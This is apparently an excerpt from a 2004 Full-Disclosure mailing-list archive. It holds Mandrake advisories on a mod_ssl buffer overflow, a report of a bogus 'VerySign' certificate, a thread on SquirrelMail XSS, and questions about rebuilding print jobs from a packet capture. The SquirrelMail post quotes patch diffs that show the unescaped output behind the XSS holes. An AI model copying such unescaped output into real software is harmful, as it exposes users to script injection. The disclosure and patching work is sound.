Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFAvPvgmqjQ0CJFipgRAo8iAJ45Y7VU+B4FPBUwtbpjNyq8WJPA7wCgoVf+ 8St+6Ck5Tqq1iRjZpa9L/x4= =iwPf -----END PGP SIGNATURE----- From security at linux-mandrake.com Tue Jun 1 23:01:32 2004 From: security at linux-mandrake.com (Mandrake Linux Security Team) Date: 1 Jun 2004 22:01:32 -0000 Subject: [Full-Disclosure] MDKSA-2004:054 - Updated mod_ssl package fix remote vulnerability Message-ID: <20040601220132.18065.qmail@updates.mandrakesoft.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandrakelinux Security Update Advisory _______________________________________________________________________ Package name: mod_ssl Advisory ID: MDKSA-2004:054 Date: June 1st, 2004 Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2 ______________________________________________________________________ Problem Description: A stack-based buffer overflow exists in the ssl_util_uuencode_binary function in ssl_engine_kernel.c in mod_ssl for Apache 1.3.x. When mod_ssl is configured to trust the issuing CA, a remote attacker may be able to execute arbitrary code via a client certificate with a long subject DN. The provided packages are patched to prevent this problem. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0488 ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: e835aa3c42443822b1bb38202a242864 10.0/RPMS/mod_ssl-2.8.16-1.1.100mdk.i586.rpm 92c3494519927447e841b87e41c18030 10.0/SRPMS/mod_ssl-2.8.16-1.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 9443127cebae4776cba6a419faea6db9 amd64/10.0/RPMS/mod_ssl-2.8.16-1.1.100mdk.amd64.rpm 92c3494519927447e841b87e41c18030 amd64/10.0/SRPMS/mod_ssl-2.8.16-1.1.100mdk.src.rpm Corporate Server 2.1: 02f0643ee2c77e343e982d45272d2736 corporate/2.1/RPMS/mod_ssl-2.8.10-5.3.C21mdk.i586.rpm 9dcf45014753c32281f3ef9424bdb4d3 corporate/2.1/SRPMS/mod_ssl-2.8.10-5.3.C21mdk.src.rpm Corporate Server 2.1/x86_64: a9bb204c891b9f4e02d611ec5d26438b x86_64/corporate/2.1/RPMS/mod_ssl-2.8.10-5.3.C21mdk.x86_64.rpm 9dcf45014753c32281f3ef9424bdb4d3 x86_64/corporate/2.1/SRPMS/mod_ssl-2.8.10-5.3.C21mdk.src.rpm Mandrakelinux 9.1: 5cb8b20c7d25a23c41797fa9cc1515ff 9.1/RPMS/mod_ssl-2.8.12-8.1.91mdk.i586.rpm f8222566b9d5dfb1a920a73f16142d4a 9.1/SRPMS/mod_ssl-2.8.12-8.1.91mdk.src.rpm Mandrakelinux 9.1/PPC: 254ddacd51c9a8a82207c4a268c064f6 ppc/9.1/RPMS/mod_ssl-2.8.12-8.1.91mdk.ppc.rpm f8222566b9d5dfb1a920a73f16142d4a ppc/9.1/SRPMS/mod_ssl-2.8.12-8.1.91mdk.src.rpm Mandrakelinux 9.2: 806e5234ca391db643339020e719bc0f 9.2/RPMS/mod_ssl-2.8.15-1.1.92mdk.i586.rpm 1bb3fbc11273a15fb681c8f94925154d 9.2/SRPMS/mod_ssl-2.8.15-1.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: d46068aa64c2aa3c106428d6bcf5e480 amd64/9.2/RPMS/mod_ssl-2.8.15-1.1.92mdk.amd64.rpm 1bb3fbc11273a15fb681c8f94925154d amd64/9.2/SRPMS/mod_ssl-2.8.15-1.1.92mdk.src.rpm Multi Network Firewall 8.2: 9855760b94cdb77928ed1a480684bd7c mnf8.2/RPMS/mod_ssl-2.8.7-3.3.M82mdk.i586.rpm 4ad6b33008550170e737fdd9d69a72ed mnf8.2/SRPMS/mod_ssl-2.8.7-3.3.M82mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFAvPy8mqjQ0CJFipgRAmaEAJ0SeN4R050lOF3LuUcQTlmzCT8INACfaQ7n qpVhOLhikQRBRFscxFo53A0= =uv5H -----END PGP SIGNATURE----- From chris at sw.gotdns.org Tue Jun 1 23:09:31 2004 From: chris at sw.gotdns.org (Chris van der Pennen) Date: Wed, 2 Jun 2004 07:39:31 +0930 (Cen. Australia Standard Time) Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate? Message-ID: I've been getting SSL certificates from various websites recently that are apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign. The certificate expired 6 December 2002. The data in Issued To and Issued By are identical. This smells very much like an SSL hijack attempt - can anyone shed some light on the situation? Chris From security at linux-mandrake.com Tue Jun 1 23:12:33 2004 From: security at linux-mandrake.com (Mandrake Linux Security Team) Date: 1 Jun 2004 22:12:33 -0000 Subject: [Full-Disclosure] MDKSA-2004:055 - Updated apache2 package fix vulnerability in mod_ssl Message-ID: <20040601221233.18774.qmail@updates.mandrakesoft.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandrakelinux Security Update Advisory _______________________________________________________________________ Package name: apache2 Advisory ID: MDKSA-2004:055 Date: June 1st, 2004 Affected versions: 10.0, 9.1, 9.2 ______________________________________________________________________ Problem Description: A stack-based buffer overflow exists in the ssl_util_uuencode_binary function in ssl_util.c in Apache. When mod_ssl is configured to trust the issuing CA, a remote attacker may be able to execute arbitrary code via a client certificate with a long subject DN. The provided packages are patched to prevent this problem. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0488 ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: 3111b612aa249513d3bfd62d660d84f5 10.0/RPMS/apache2-2.0.48-6.2.100mdk.i586.rpm be7f4c6d9976385c6884762a67521a20 10.0/RPMS/apache2-common-2.0.48-6.2.100mdk.i586.rpm 510706a2c99f5f7cc5f3e77bdb5da5aa 10.0/RPMS/apache2-devel-2.0.48-6.2.100mdk.i586.rpm f227a7c85de5ab4ccdc0b23afb6c7592 10.0/RPMS/apache2-manual-2.0.48-6.2.100mdk.i586.rpm 0f39dd91febd2c23330e9d1c493891b6 10.0/RPMS/apache2-mod_cache-2.0.48-6.2.100mdk.i586.rpm df6e1335b214e94f0c674851ff3212cf 10.0/RPMS/apache2-mod_dav-2.0.48-6.2.100mdk.i586.rpm b1c6a7416444501b8060bbdf8ca48f0a 10.0/RPMS/apache2-mod_deflate-2.0.48-6.2.100mdk.i586.rpm b6280f32c97c63b5088012838bc89cba 10.0/RPMS/apache2-mod_disk_cache-2.0.48-6.2.100mdk.i586.rpm 5c170c8430f68fb4a4afed4434b1e513 10.0/RPMS/apache2-mod_file_cache-2.0.48-6.2.100mdk.i586.rpm 23bc5e376539bcee81b457f730efd7fd 10.0/RPMS/apache2-mod_ldap-2.0.48-6.2.100mdk.i586.rpm 9ce5229a7cc6ab93d85ec012ce696494 10.0/RPMS/apache2-mod_mem_cache-2.0.48-6.2.100mdk.i586.rpm 0c86183703f69db7cdb28de391d3f78e 10.0/RPMS/apache2-mod_proxy-2.0.48-6.2.100mdk.i586.rpm b87416a718964d75904e529e52106063 10.0/RPMS/apache2-mod_ssl-2.0.48-6.2.100mdk.i586.rpm 432f0f4ae5e38e9b43b8364f324763dc 10.0/RPMS/apache2-modules-2.0.48-6.2.100mdk.i586.rpm 0427b1a08aabbd081cfca08af6071588 10.0/RPMS/apache2-source-2.0.48-6.2.100mdk.i586.rpm f9ab0637af7ce7159d5252976ddd27e1 10.0/RPMS/libapr0-2.0.48-6.2.100mdk.i586.rpm c2af0f267d9b0a31539c7c5e7fbdb4d9 10.0/SRPMS/apache2-2.0.48-6.2.100mdk.src.rpm Mandrakelinux 10.0/AMD64: b5434064b5ba9aa3295275029dd355f7 amd64/10.0/RPMS/apache2-2.0.48-6.2.100mdk.amd64.rpm 3e24450b95d3800cb2b53cbfe4247ed2 amd64/10.0/RPMS/apache2-common-2.0.48-6.2.100mdk.amd64.rpm 1513d147a1cd7e7d39b3544cef4452d8 amd64/10.0/RPMS/apache2-devel-2.0.48-6.2.100mdk.amd64.rpm 337ff1d5f687d7ea370d66244f1f773d amd64/10.0/RPMS/apache2-manual-2.0.48-6.2.100mdk.amd64.rpm 77a114c6f9a8719e1a1c190efef8744c amd64/10.0/RPMS/apache2-mod_cache-2.0.48-6.2.100mdk.amd64.rpm 0f4e28c95bf98b580974cef192aed867 amd64/10.0/RPMS/apache2-mod_dav-2.0.48-6.2.100mdk.amd64.rpm 25a8a1b55d27e905eaf152a4ac264dbd amd64/10.0/RPMS/apache2-mod_deflate-2.0.48-6.2.100mdk.amd64.rpm 4c5dc9c54eb70194a3060a2365d6b4e8 amd64/10.0/RPMS/apache2-mod_disk_cache-2.0.48-6.2.100mdk.amd64.rpm d72b2779cd56ac23897071f6d8c62384 amd64/10.0/RPMS/apache2-mod_file_cache-2.0.48-6.2.100mdk.amd64.rpm 752d4bca2e9fd6815745ce2265250c67 amd64/10.0/RPMS/apache2-mod_ldap-2.0.48-6.2.100mdk.amd64.rpm d414e1317b44b367d42937dd476e8484 amd64/10.0/RPMS/apache2-mod_mem_cache-2.0.48-6.2.100mdk.amd64.rpm 0c33ae8b773b13eb528aa1e1769e36fa amd64/10.0/RPMS/apache2-mod_proxy-2.0.48-6.2.100mdk.amd64.rpm fd54f99ef0c42360e09799cf881cd37b amd64/10.0/RPMS/apache2-mod_ssl-2.0.48-6.2.100mdk.amd64.rpm c2361c2527ebbeafef57034173d2840b amd64/10.0/RPMS/apache2-modules-2.0.48-6.2.100mdk.amd64.rpm f799b8ddd90bca399459acd04b7010e0 amd64/10.0/RPMS/apache2-source-2.0.48-6.2.100mdk.amd64.rpm e60ee45d646fb0a6bc6c20f18b7c30d3 amd64/10.0/RPMS/lib64apr0-2.0.48-6.2.100mdk.amd64.rpm c2af0f267d9b0a31539c7c5e7fbdb4d9 amd64/10.0/SRPMS/apache2-2.0.48-6.2.100mdk.src.rpm Mandrakelinux 9.1: a11cbb72043587a99412d7052dcba791 9.1/RPMS/apache2-2.0.47-1.8.91mdk.i586.rpm bbc02417b82fa4bc6b2b7a74a204c7c2 9.1/RPMS/apache2-common-2.0.47-1.8.91mdk.i586.rpm 4cf89cb891b0856ba8b162e67061ea1a 9.1/RPMS/apache2-devel-2.0.47-1.8.91mdk.i586.rpm a96bfe336f16891d1d20a5a13b56a36f 9.1/RPMS/apache2-manual-2.0.47-1.8.91mdk.i586.rpm fea9374b8a23495b08ef5adad4074d23 9.1/RPMS/apache2-mod_dav-2.0.47-1.8.91mdk.i586.rpm 88e51a6e2be5c81063e29c7429c63733 9.1/RPMS/apache2-mod_ldap-2.0.47-1.8.91mdk.i586.rpm d33b565415852146de64b950e2aeb178 9.1/RPMS/apache2-mod_ssl-2.0.47-1.8.91mdk.i586.rpm 69a56bece8b91acfdc11e199dbe486c3 9.1/RPMS/apache2-modules-2.0.47-1.8.91mdk.i586.rpm a17ba2052134939a3e5947f595162033 9.1/RPMS/apache2-source-2.0.47-1.8.91mdk.i586.rpm 5d0d10fe9603e84a1d48910c31eb783e 9.1/RPMS/libapr0-2.0.47-1.8.91mdk.i586.rpm d3034e88376372e030e6933191fd2dc9 9.1/SRPMS/apache2-2.0.47-1.8.91mdk.src.rpm Mandrakelinux 9.1/PPC: cdbeb822dbb99fda215877ea3e62b2b7 ppc/9.1/RPMS/apache2-2.0.47-1.8.91mdk.ppc.rpm ea58b7fe2522668f5748d722e38536fb ppc/9.1/RPMS/apache2-common-2.0.47-1.8.91mdk.ppc.rpm 830e5778c4765b6d788e6edc0de9e06f ppc/9.1/RPMS/apache2-devel-2.0.47-1.8.91mdk.ppc.rpm ce43d8231c6e6e923871744fd72596f5 ppc/9.1/RPMS/apache2-manual-2.0.47-1.8.91mdk.ppc.rpm c88920e151a05c23dffe03998973e1a1 ppc/9.1/RPMS/apache2-mod_dav-2.0.47-1.8.91mdk.ppc.rpm f5b23a897dd1ee750496a7d852e634c5 ppc/9.1/RPMS/apache2-mod_ldap-2.0.47-1.8.91mdk.ppc.rpm 494663652f8644d56beace3df3c63f00 ppc/9.1/RPMS/apache2-mod_ssl-2.0.47-1.8.91mdk.ppc.rpm 3e02de6e503834d5982510d549117bcf ppc/9.1/RPMS/apache2-modules-2.0.47-1.8.91mdk.ppc.rpm cd2d7f0e97ae4bceb365332f868d986d ppc/9.1/RPMS/apache2-source-2.0.47-1.8.91mdk.ppc.rpm 7f1525deceba60b85382ec30b4bb8003 ppc/9.1/RPMS/libapr0-2.0.47-1.8.91mdk.ppc.rpm d3034e88376372e030e6933191fd2dc9 ppc/9.1/SRPMS/apache2-2.0.47-1.8.91mdk.src.rpm Mandrakelinux 9.2: b45203ab6443ad24bc2373a82a9d0234 9.2/RPMS/apache2-2.0.47-6.5.92mdk.i586.rpm f727f5ce2d9504484b6acf7589f6a981 9.2/RPMS/apache2-common-2.0.47-6.5.92mdk.i586.rpm eafda47abdec2ac8e5898fb37c604def 9.2/RPMS/apache2-devel-2.0.47-6.5.92mdk.i586.rpm 8842f5bab2a525868d7ded2c7737bf38 9.2/RPMS/apache2-manual-2.0.47-6.5.92mdk.i586.rpm e5eca4891a90df4777f83297fcb397d4 9.2/RPMS/apache2-mod_cache-2.0.47-6.5.92mdk.i586.rpm c234e089f0d35fbcd62360f8ce3fa6fb 9.2/RPMS/apache2-mod_dav-2.0.47-6.5.92mdk.i586.rpm 623397c51d7b7239d169a997e7a365c0 9.2/RPMS/apache2-mod_deflate-2.0.47-6.5.92mdk.i586.rpm 1a884f364a4155eb18698dc3a7fb92f3 9.2/RPMS/apache2-mod_disk_cache-2.0.47-6.5.92mdk.i586.rpm 5ee061ac770af13bfc11a600d4a65ea1 9.2/RPMS/apache2-mod_file_cache-2.0.47-6.5.92mdk.i586.rpm 88d9923fe86c2aa9eb3a249776ff8976 9.2/RPMS/apache2-mod_ldap-2.0.47-6.5.92mdk.i586.rpm 179cbd3f6cb9b1e8d3536134e0e35354 9.2/RPMS/apache2-mod_mem_cache-2.0.47-6.5.92mdk.i586.rpm 9167804d711ee3a478cd7042a0aa523d 9.2/RPMS/apache2-mod_proxy-2.0.47-6.5.92mdk.i586.rpm 8ec772426dd2600b65021c5f60748c52 9.2/RPMS/apache2-mod_ssl-2.0.47-6.5.92mdk.i586.rpm dcc9dba2ecc0e8fa7e8fe9dae75b0959 9.2/RPMS/apache2-modules-2.0.47-6.5.92mdk.i586.rpm 0b949c30da2754ae3b88a803cb45517a 9.2/RPMS/apache2-source-2.0.47-6.5.92mdk.i586.rpm 0833bcad1698f811d18bbb12ce11dc3c 9.2/RPMS/libapr0-2.0.47-6.5.92mdk.i586.rpm 1afd7ce470710ac3ed8f7ae4e344ff92 9.2/SRPMS/apache2-2.0.47-6.5.92mdk.src.rpm Mandrakelinux 9.2/AMD64: 6744490bc56e70abf362927c3755db17 amd64/9.2/RPMS/apache2-2.0.47-6.5.92mdk.amd64.rpm 35e7d6f05a478db830a165aa05382a17 amd64/9.2/RPMS/apache2-common-2.0.47-6.5.92mdk.amd64.rpm cfa01cdb3126e6a735ff69c936c1f9e5 amd64/9.2/RPMS/apache2-devel-2.0.47-6.5.92mdk.amd64.rpm 5e52e0ef523a8383cede0395c2c04430 amd64/9.2/RPMS/apache2-manual-2.0.47-6.5.92mdk.amd64.rpm db785af0a804319de566134b585abb36 amd64/9.2/RPMS/apache2-mod_cache-2.0.47-6.5.92mdk.amd64.rpm 0c1fe531569925cfd812d1340489ecc5 amd64/9.2/RPMS/apache2-mod_dav-2.0.47-6.5.92mdk.amd64.rpm f67dab1f37130bf6eb0ddfb65c4fdda9 amd64/9.2/RPMS/apache2-mod_deflate-2.0.47-6.5.92mdk.amd64.rpm ed8d8f03faff8ebbe3d88392fa94dcd4 amd64/9.2/RPMS/apache2-mod_disk_cache-2.0.47-6.5.92mdk.amd64.rpm e4ceff685c7aac3f156a05ecd91e73f4 amd64/9.2/RPMS/apache2-mod_file_cache-2.0.47-6.5.92mdk.amd64.rpm 0cedfd81e38b7af96a20a58d75afb4b6 amd64/9.2/RPMS/apache2-mod_ldap-2.0.47-6.5.92mdk.amd64.rpm ebee758fa628bcadd8a53cea587497a2 amd64/9.2/RPMS/apache2-mod_mem_cache-2.0.47-6.5.92mdk.amd64.rpm aa732eb8c3cd2d5f456e15cdcce6aa08 amd64/9.2/RPMS/apache2-mod_proxy-2.0.47-6.5.92mdk.amd64.rpm 41e4d2277f0196b9a6e5d259f9df39c4 amd64/9.2/RPMS/apache2-mod_ssl-2.0.47-6.5.92mdk.amd64.rpm 1014599e6cfb73e88cd8991cb8f78bfc amd64/9.2/RPMS/apache2-modules-2.0.47-6.5.92mdk.amd64.rpm f91bc1ce80d21e5b2830e7c1aead5178 amd64/9.2/RPMS/apache2-source-2.0.47-6.5.92mdk.amd64.rpm 6d6fed31d95ee6b23f6fce0abe9e645a amd64/9.2/RPMS/lib64apr0-2.0.47-6.5.92mdk.amd64.rpm 1afd7ce470710ac3ed8f7ae4e344ff92 amd64/9.2/SRPMS/apache2-2.0.47-6.5.92mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFAvP9RmqjQ0CJFipgRAnLWAJ9XhMeD5o0GtecsyXY8IVVQGGT8XwCeP562 +x53j3ohHo6aZEMnXAy7sko= =EJEa -----END PGP SIGNATURE----- From roman at rs-labs.com Wed Jun 2 00:49:01 2004 From: roman at rs-labs.com (Roman Medina) Date: Wed, 02 Jun 2004 01:49:01 +0200 Subject: [Full-Disclosure] Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability In-Reply-To: <20040601211332.GB1538@lupe-christoph.de> References: <20040601211332.GB1538@lupe-christoph.de> Message-ID: <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com> On Tue, 1 Jun 2004 23:13:32 +0200, you wrote: >On Sunday, 2004-05-30 at 03:15:44 +0200, Roman Medina wrote: > >> I also noticed that latest Debian stable distro ships a very old >> version of SquirrelMail, which is vulnerable to several old XSS bugs >> (in addition to the new one). > >The latest Stable is itself quite old. Debian does not release very >often. But security bugs are fixed when they become known. I have not >found any bug report concerning XSS in the Debian bugs database. Please >be so kind and file bugs if you are running Debian. If not, please mail >the Debian Security Team as described in > http://www.de.debian.org/security/faq#contact The point here is that it is not easy or always possible to track any error being corrected on every software. In other words, many vendors/developers silently fixes bugs and they don't necesarily have to know who is packaging their software and inform them. Mix this with the (IMHO) too much conservative Debian's policy, beat well and you've got it :-) I did not performed an exhaustive check. Simply I chose some of the latest 2.x versions from changelog where it was listed the string "XSS", I had the strong feeling that the bug would be still present in Debian stable. And I guessed it :) The result is listed in my advisory. Quoting from it: " I chose between two beautiful bugs: roman at rs-labs:~$ diff -ur squirrelmail-1.2.10/src/read_body.php squirrelmail-1.2.11/src/read_body.php @@ -976,7 +977,7 @@ "" . _("Mailer") . ': '. "" . - - "$mailer " . + "" . htmlentities($mailer) . " " . '' . "" . "\n"; roman at rs-labs:~$ diff -ur squirrelmail-1.2.10/functions/mailbox_display.php squirrelmail-1.2.11/functions/mailbox_display.php require_once('../functions/strings.php'); @@ -59,7 +59,7 @@ if ($senderName != '') { $senderName .= ', '; } - - $senderName .= sqimap_find_displayable_name($senderNames_part); + $senderName .= htmlentities(sqimap_find_displayable_name($senderNames_part)); } } " I repeat that I didn't test other versions (and I haven't more time to spend on this). I've placed Debian security team email on CC but you should know that I informed Sam (Debian maintainer for SM) of all this issues. Indeed I've exchanged many mails with SM team / Sam (both of them always being on CC / To). The final advisory also was sent to Sam before the release. I supposed he would release new .deb packages. I don't know what happened. Saludos, --Roman -- PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] From security at linux-mandrake.com Wed Jun 2 01:12:15 2004 From: security at linux-mandrake.com (Mandrake Linux Security Team) Date: 2 Jun 2004 00:12:15 -0000 Subject: [Full-Disclosure] MDKSA-2004:054 - Updated mod_ssl package fix remote vulnerability Message-ID: <20040602001215.19511.qmail@updates.mandrakesoft.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandrakelinux Security Update Advisory _______________________________________________________________________ Package name: mod_ssl Advisory ID: MDKSA-2004:054 Date: June 1st, 2004 Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2 ______________________________________________________________________ Problem Description: A stack-based buffer overflow exists in the ssl_util_uuencode_binary function in ssl_engine_kernel.c in mod_ssl for Apache 1.3.x. When mod_ssl is configured to trust the issuing CA, a remote attacker may be able to execute arbitrary code via a client certificate with a long subject DN. The provided packages are patched to prevent this problem. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0488 ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0: e835aa3c42443822b1bb38202a242864 10.0/RPMS/mod_ssl-2.8.16-1.1.100mdk.i586.rpm 92c3494519927447e841b87e41c18030 10.0/SRPMS/mod_ssl-2.8.16-1.1.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 9443127cebae4776cba6a419faea6db9 amd64/10.0/RPMS/mod_ssl-2.8.16-1.1.100mdk.amd64.rpm 92c3494519927447e841b87e41c18030 amd64/10.0/SRPMS/mod_ssl-2.8.16-1.1.100mdk.src.rpm Corporate Server 2.1: 02f0643ee2c77e343e982d45272d2736 corporate/2.1/RPMS/mod_ssl-2.8.10-5.3.C21mdk.i586.rpm 9dcf45014753c32281f3ef9424bdb4d3 corporate/2.1/SRPMS/mod_ssl-2.8.10-5.3.C21mdk.src.rpm Corporate Server 2.1/x86_64: a9bb204c891b9f4e02d611ec5d26438b x86_64/corporate/2.1/RPMS/mod_ssl-2.8.10-5.3.C21mdk.x86_64.rpm 9dcf45014753c32281f3ef9424bdb4d3 x86_64/corporate/2.1/SRPMS/mod_ssl-2.8.10-5.3.C21mdk.src.rpm Mandrakelinux 9.1: 5cb8b20c7d25a23c41797fa9cc1515ff 9.1/RPMS/mod_ssl-2.8.12-8.1.91mdk.i586.rpm f8222566b9d5dfb1a920a73f16142d4a 9.1/SRPMS/mod_ssl-2.8.12-8.1.91mdk.src.rpm Mandrakelinux 9.1/PPC: 254ddacd51c9a8a82207c4a268c064f6 ppc/9.1/RPMS/mod_ssl-2.8.12-8.1.91mdk.ppc.rpm f8222566b9d5dfb1a920a73f16142d4a ppc/9.1/SRPMS/mod_ssl-2.8.12-8.1.91mdk.src.rpm Mandrakelinux 9.2: 806e5234ca391db643339020e719bc0f 9.2/RPMS/mod_ssl-2.8.15-1.1.92mdk.i586.rpm 1bb3fbc11273a15fb681c8f94925154d 9.2/SRPMS/mod_ssl-2.8.15-1.1.92mdk.src.rpm Mandrakelinux 9.2/AMD64: d46068aa64c2aa3c106428d6bcf5e480 amd64/9.2/RPMS/mod_ssl-2.8.15-1.1.92mdk.amd64.rpm 1bb3fbc11273a15fb681c8f94925154d amd64/9.2/SRPMS/mod_ssl-2.8.15-1.1.92mdk.src.rpm Multi Network Firewall 8.2: 9855760b94cdb77928ed1a480684bd7c mnf8.2/RPMS/mod_ssl-2.8.7-3.3.M82mdk.i586.rpm 4ad6b33008550170e737fdd9d69a72ed mnf8.2/SRPMS/mod_ssl-2.8.7-3.3.M82mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFAvRtfmqjQ0CJFipgRArpPAKCe5Prh9xa8pbQzXLE6m+JwdxbgFwCg651p YW0+Z6z/hwipDRdWmQ/ABG8= =eoEM -----END PGP SIGNATURE----- From mdz at debian.org Wed Jun 2 00:59:42 2004 From: mdz at debian.org (Matt Zimmerman) Date: Tue, 1 Jun 2004 16:59:42 -0700 Subject: [Full-Disclosure] Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability In-Reply-To: <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com> References: <20040601211332.GB1538@lupe-christoph.de> <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com> Message-ID: <20040601235942.GS19402@alcor.net> On Wed, Jun 02, 2004 at 01:49:01AM +0200, Roman Medina wrote: > In other words, many vendors/developers silently fixes bugs and they don't > necesarily have to know who is packaging their software and inform them. Such vendors/developers are doing a their users and the community a disservice. Proper public disclosure of vulnerabilities requires very little effort on their part; there is no good reason to conceal information this way. There is no need to contact every downstream vendor directly; they monitor the usual channels. -- - mdz From Ian.Latter at mq.edu.au Wed Jun 2 04:32:07 2004 From: Ian.Latter at mq.edu.au (Ian Latter) Date: Wed, 02 Jun 2004 13:32:07 +1000 Subject: [Full-Disclosure] PCAP and LP Message-ID: <200406020332.i523W9J14307@singularity.tronunltd.com> Hello, Quick question, I'm going through the results of an investigation and have a PCAP file that contains Line Printing ... I'd like to reconstruct the postscript files (or just reprint them), is there a tool that will allow this? Web searches yield HTTP file reconstructors and NFS file reconstructors, but I've been unable to find anything for LP. Utility doesn't need to be opensource, free/share ware, but it would be easiest if it was. Thanks in advance, -- Ian Latter Internet and Networking Security Officer Macquarie University From ali at packetknife.com Wed Jun 2 04:12:19 2004 From: ali at packetknife.com (Ali-Reza Anghaie) Date: Tue, 01 Jun 2004 23:12:19 -0400 Subject: [Full-Disclosure] PCAP and LP In-Reply-To: <200406020332.i523W9J14307@singularity.tronunltd.com> References: <200406020332.i523W9J14307@singularity.tronunltd.com> Message-ID: <1086145939.3039.5.camel@damascus.packetknife.com> On Tue, 2004-06-01 at 23:32, Ian Latter wrote: > Quick question, I'm going through the results of an investigation > and have a PCAP file that contains Line Printing ... I'd like to > reconstruct the postscript files (or just reprint them), is there a > tool that will allow this? I'm not sure about reconstructing the PS file in a reasonable fashion (there is a good spec, it's a grokkable format, but it's not easily regexed in comparison to any other text)... Perhaps using tcpreplay to push it to a printer would do? -Ali -- OpenPGP Key: 030E44E6 -- Was I helpful?: http://svcs.affero.net/rm.php?r=packetknife -- I wouldn't get out of an electric chair to get in one of these things. -- Rusty Wallace (on IRL) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040601/ce336589/attachment.bin From Ian.Latter at mq.edu.au Wed Jun 2 07:04:30 2004 From: Ian.Latter at mq.edu.au (Ian Latter) Date: Wed, 02 Jun 2004 16:04:30 +1000 Subject: [Full-Disclosure] PCAP and LP Message-ID: <200406020604.i5264V314791@singularity.tronunltd.com> Hello Ali, According to the FAQ, this doesn't look entirely possible; [...] 4.10 Replaying Client Traffic to a Server A common question on the tcpreplay-users list is how does one replay the client side of a connection back to a server. Unfortunately, tcpreplay doesn't support this right now. The major problem concerns syncing up TCP Seq/Ack numbers which will be different. ICMP also often contains IP header information which would need to be adjusted. About the only thing that could be easy to do is UDP, which isn't usually requested. [...] From; http://tcpreplay.sourceforge.net/FAQ.html I've had one other suggestion, and that is contacting the author of "chaosreader" (with greenback or source); http://users.tpg.com.au/bdgcvb/chaosreader.html 's'cool ... I'll fish the web a little more and see what comes out ... if nothing comes out, and I can't make a quick contribution to chaosreader, then I'll probably change the target host to acquire the asset via another protocol (http/smtp/etc). Thanks all. ----- Original Message ----- >From: "Ali-Reza Anghaie" >To: "Ian Latter" >Subject: Re: [Full-Disclosure] PCAP and LP >Date: Tue, 01 Jun 2004 23:12:19 -0400 > > On Tue, 2004-06-01 at 23:32, Ian Latter wrote: > > Quick question, I'm going through the results of an investigation > > and have a PCAP file that contains Line Printing ... I'd like to > > reconstruct the postscript files (or just reprint them), is there a > > tool that will allow this? > > I'm not sure about reconstructing the PS file in a reasonable fashion > (there is a good spec, it's a grokkable format, but it's not easily > regexed in comparison to any other text)... > > Perhaps using tcpreplay to push it to a printer would do? > > -Ali > > -- > OpenPGP Key: 030E44E6 > -- > Was I helpful?: http://svcs.affero.net/rm.php?r=packetknife > -- > I wouldn't get out of an electric chair to get in one of these > things. -- Rusty Wallace (on IRL) > -- Ian Latter Internet and Networking Security Officer Macquarie University From dowlingg at sullcrom.com Wed Jun 2 06:26:42 2004 From: dowlingg at sullcrom.com (Dowling, Gabrielle) Date: Wed, 2 Jun 2004 01:26:42 -0400 Subject: [Full-Disclosure] Cleanining viruses from netware Message-ID: 